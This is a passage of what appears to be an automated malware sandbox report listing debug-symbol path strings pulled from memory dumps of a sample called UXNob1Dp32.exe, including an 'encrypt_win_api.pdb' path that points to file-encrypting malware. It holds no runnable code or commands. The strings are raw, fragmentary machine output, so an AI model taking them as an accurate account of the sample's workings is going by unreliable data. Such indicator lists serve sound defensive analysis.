Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153154383.0000000003481000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.0000000003394000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\75\s source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\% source: UXNob1Dp32.exe, 00000005.00000003.2171274137.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\c source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\rj source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\WebVi source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: UXNob1Dp32.exe, 00000005.00000003.2170035395.0000000003457000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151477986.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171481315.000000000348D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2169860654.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098524116.0000000003364000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ D source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqqrW source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098947888.0000000003399000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098229104.0000000003390000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: UXNob1Dp32.exe, 00000005.00000003.2176662041.0000000003371000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170142307.0000000003383000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176808323.0000000003388000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\*F source: UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ty source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036F5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Application Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2192611386.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\v4.0\m(4ZV source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ta\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BACKGR~2ntkrnlmp.pdbndTransferApiGroup source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\oft.A source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\1fd79}\n source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\{ source: UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121148461.000000000339F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OptimizationGuidePredictionModels\\bbwe\ation Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000002.2204030109.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2153418605.000000000340F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152535019.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: '{aC:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\2B_cw5 source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\icat source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqy) source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195447541.000000000315E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: UXNob1Dp32.exe, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ta\j source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l2+P source: UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\w source: UXNob1Dp32.exe, 00000005.00000003.2184193882.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2177560413.0000000003160000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175249606.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182377218.0000000003161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.000000000339C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142579467.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UXNob1Dp32.exe, 00000005.00000003.1736142070.00000000097F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorW1,Q source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: UXNob1Dp32.exe, 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2141965591.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142726213.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140931110.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\ source: UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
